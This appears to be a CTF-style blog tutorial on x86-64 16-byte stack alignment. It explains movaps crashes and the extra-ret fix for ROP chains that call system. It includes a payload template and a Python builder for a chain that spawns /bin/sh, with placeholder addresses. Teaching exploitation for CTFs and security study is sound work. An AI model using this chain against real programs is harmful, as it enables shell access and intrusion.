16-Byte Alignment

By Vesper Vei
4-minute read

Table of Contents

  1. 16-Byte Alignment
    1. Why does this rule exist? (Hardware’s “OCD”)
    2. The “dynamic changes” of 16-byte alignment
    3. A Pwn player’s nightmare: the alignment pit in a ROP chain
    4. The ultimate remedy: add one more ret
    5. How do you identify it while debugging?
    6. Summary Notes

16-Byte Alignment

In the world of Pwn, 16-byte alignment (Stack Alignment) is absolutely a beginner’s “number one killer.” You may have built a perfect ROP chain with flawless logic, yet when running locally or attacking remotely, the program mysteriously crashes directly with SIGSEGV (segmentation fault) inside system or printf.

It feels like you prepared a master key, only to find the lock won’t open because the core is off by 1 millimeter.


1. Why does this rule exist? (Hardware’s “OCD”)

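This rule comes from the x86-64 SSE (Streaming SIMD Extensions) instruction set. For maximum performance, when the CPU moves 128-bit (16-byte) data (such as floating-point values, or 16-byte chunks of ordinary stack data that the compiler copies or zeroes), the compiler emits instructions like movaps (Move Aligned Packed Single-Precision Floating-Point Values). movaps requires its memory operand to sit at an address that is a multiple of 16. If it does not, the CPU raises a general-protection fault, which Linux delivers to the process as SIGSEGV. There is no slow fallback path: a misaligned movaps simply kills the program.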
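The rule boils down to one modulo check on the effective address of the memory operand (RSP plus the displacement). A minimal sketch; the helper name `movaps_faults` is hypothetical and only models the alignment check, not the full instruction:

```python
def movaps_faults(rsp: int, disp: int) -> bool:
    """Return True if `movaps [rsp+disp], xmm` would fault.

    movaps requires its memory operand to be 16-byte aligned; a
    misaligned address raises #GP, which Linux reports as SIGSEGV.
    """
    effective_address = rsp + disp
    return effective_address % 16 != 0


# Same displacement, RSP ending in 0 versus RSP ending in 8.
print(movaps_faults(0x7FFE_1234_5670, 0x50))  # False: address ends in 0xC0
print(movaps_faults(0x7FFE_1234_5678, 0x50))  # True: address ends in 0xC8
```

Because compilers normally use displacements that are multiples of 16 for these accesses, whether the instruction faults in practice comes down to the last hex digit of RSP.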


2. The “dynamic changes” of 16-byte alignment

This is the part that most easily confuses people. According to the System V AMD64 ABI:

Before executing the call instruction, the stack pointer RSP must be 16-byte aligned.

Let’s track how the stack changes:

  1. Before the call: RSP = 0x...00 (16-byte aligned, address ending in 0).

  2. Execute call: The CPU automatically pushes the return address (8 bytes) onto the stack.

    • At this point, RSP becomes 0x...F8 (no longer a multiple of 16, offset by 8 bytes).
  3. Enter the function body: The first instruction of the function is usually push rbp.

    • At this point, RSP becomes 0x...F0 (hey! back to being a multiple of 16).
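The three steps above are plain subtraction on RSP, so they are easy to replay. A small sketch that tracks RSP through `call` and `push rbp`; the starting address is an arbitrary illustrative value, and the function name is hypothetical:

```python
def simulate_call_and_prologue(rsp_before_call: int) -> list[tuple[str, int]]:
    """Track RSP through `call f` followed by `push rbp` in f's prologue."""
    trace = [("before call", rsp_before_call)]
    rsp = rsp_before_call - 8  # call pushes the 8-byte return address
    trace.append(("after call (function entry)", rsp))
    rsp -= 8  # push rbp saves the caller's frame pointer
    trace.append(("after push rbp", rsp))
    return trace


for label, rsp in simulate_call_and_prologue(0x7FFE_DEAD_BE00):
    print(f"{label:28} {rsp:#x}  aligned={rsp % 16 == 0}")
```

The alignment flag goes True, False, True, which is exactly the 0x...00, 0x...F8, 0x...F0 sequence described in the list.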

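Conclusion: The compiler assumes every function is entered the normal way, with RSP ending in 8, and sizes the prologue (push rbp plus any stack allocation) so that RSP is 16-byte aligned while the function body runs. But if you jump directly to the start of the function by other means (such as ROP), RSP at entry can be off by 8, and then every aligned access inside the body is off by 8 as well.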


3. A Pwn player’s nightmare: the alignment pit in a ROP chain

When you build a ROP chain, you are effectively manually “stitching together” return addresses.

Typical failure case:

You found the address of system and prepared pop rdi; ret for argument passing. Your payload looks like this:

[padding] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]

In this process, you skip the normal call flow and enter system via ret, so no call ever pushed a return address for it. If RSP at that moment is off by 8 from what a real call would have left (so that by the time system’s body runs, RSP ends in 8 instead of 0), then as soon as system executes a movaps on the stack internally, it crashes immediately.
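To see why the naive chain can land on the wrong parity, model the stack as 8-byte slots. Each slot of the chain is consumed by a ret or a pop, so when execution reaches the address stored in chain[index], RSP points just past that slot. A real call leaves RSP ending in 8 at function entry, so the slot holding system_addr must sit at an address ending in 0. The sketch assumes the overwritten saved return address lives at a known stack address; `ret_slot` below is a hypothetical value chosen so that the naive chain comes out misaligned, and real addresses depend on the binary and ASLR:

```python
SLOT = 8  # each ROP chain entry is one 8-byte qword on x86-64


def entry_rsp(ret_slot: int, index: int) -> int:
    """RSP at the moment execution reaches the address in chain[index].

    chain[0] overwrites the saved return address at `ret_slot`. Every
    slot up to and including chain[index] has been popped by then
    (by ret or by pop gadgets), so RSP points just past that slot.
    """
    return ret_slot + (index + 1) * SLOT


def entry_looks_like_call(rsp_at_entry: int) -> bool:
    """A genuine `call` leaves RSP ending in 8 at function entry."""
    return rsp_at_entry % 16 == 8


# Naive chain: [pop rdi; ret] [/bin/sh_addr] [system_addr]
ret_slot = 0x7FFC_0000_1008  # hypothetical address of the saved return address
rsp = entry_rsp(ret_slot, index=2)  # system_addr is chain[2]
print(hex(rsp), entry_looks_like_call(rsp))  # 0x7ffc00001020 False
```

With one extra ret in front, system becomes chain[3] and its entry RSP is 0x7ffc00001028, which ends in 8 just as a real call would leave it. The same arithmetic also shows the flip side: if `ret_slot` had the other parity, the naive chain would already be aligned and an extra ret would break it.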


4. The ultimate remedy: add one more ret

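If you find that your ROP chain crashes when calling system, and debugging shows it dies on movaps, the simplest black magic is: before calling the target function, insert a do-nothing ret gadget. A lone ret just pops the next 8 bytes into RIP and continues, so its only effect is to consume one 8-byte slot. That shifts every later slot, including system’s, by 8 bytes and puts RSP back on the alignment that system expects.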

Fixed payload:

[padding] + [ret_gadget] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]
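The fixed payload can be assembled with nothing but Python’s struct module. A sketch in which every address and the padding length are hypothetical placeholders (take the real values from your target binary or libc); `p64` here is a local helper that mirrors what pwntools’ `p64` does:

```python
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value (same idea as pwntools' p64)."""
    return struct.pack("<Q", value)


# Hypothetical placeholders, not real addresses.
PADDING_LEN = 0x48
RET_GADGET = 0x40101A   # a lone `ret`
POP_RDI_RET = 0x401196  # `pop rdi; ret`
BINSH_ADDR = 0x402004   # the "/bin/sh" string
SYSTEM_ADDR = 0x401040  # system (for example, its PLT entry)


def build_payload(align: bool) -> bytes:
    chain = [POP_RDI_RET, BINSH_ADDR, SYSTEM_ADDR]
    if align:
        # One extra ret consumes one 8-byte slot and does nothing else,
        # so system's slot moves by 8 and the entry RSP parity flips.
        chain.insert(0, RET_GADGET)
    return b"A" * PADDING_LEN + b"".join(p64(addr) for addr in chain)


naive = build_payload(align=False)
fixed = build_payload(align=True)
print(len(naive), len(fixed))  # the fixed payload is exactly 8 bytes longer
```

The ret does not have to be first: placing it directly before system_addr works too. What matters is that exactly one extra slot sits somewhere before system, and never between a pop gadget and the value it pops.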


5. How do you identify it while debugging?

In GDB (for example, with the pwndbg plugin), when the program crashes:

  1. Look at the instruction where it crashed. Is it something like movaps XMMWORD PTR [rsp+...], xmm...?
  2. Check the value of RSP. Is the last hex digit of the address something other than 0 (for example, 8)?
  3. If both answers are yes, case closed: this is a 16-byte alignment problem.
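The three checks above can be written down as a quick heuristic. This is a hypothetical helper, not a pwndbg feature: you paste in the faulting instruction line and the RSP value from the debugger. It only looks for movaps, as the checklist does, so other aligned SSE instructions would need to be added by hand:

```python
import re


def looks_like_alignment_crash(crash_insn: str, rsp: int) -> bool:
    """Heuristic version of the three checks above.

    `crash_insn` is the faulting instruction as printed by the debugger
    (a full disassembly line with address and symbol also works),
    `rsp` is the value of RSP at the crash.
    """
    insn = crash_insn.lower()
    is_movaps = re.search(r"\bmovaps\b", insn) is not None
    touches_stack = "rsp" in insn  # register-to-register movaps never faults
    return is_movaps and touches_stack and rsp % 16 != 0


print(looks_like_alignment_crash("movaps XMMWORD PTR [rsp+0x50], xmm0", 0x7FFC00001018))
```

A True result is a strong hint rather than proof; the final confirmation is that the extra ret from the previous section makes the crash go away.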

Summary Notes

| State | RSP state | Notes |
|---|---|---|
| Before a standard call | Must be aligned (ends in 0) | Mandatory ABI requirement |
| After executing call | Unaligned (ends in 8) | Because an 8-byte return address was pushed |
| Crash after a ROP jump | Usually ends in 8 | Causes SIMD instructions (movaps) inside system to fault |
| Alignment strategy | Add one ret instruction | Forces a shift by 8 bytes to cancel the offset |

Now you understand why your payload logic can be completely correct and yet still need one mysterious extra ret to make it work.

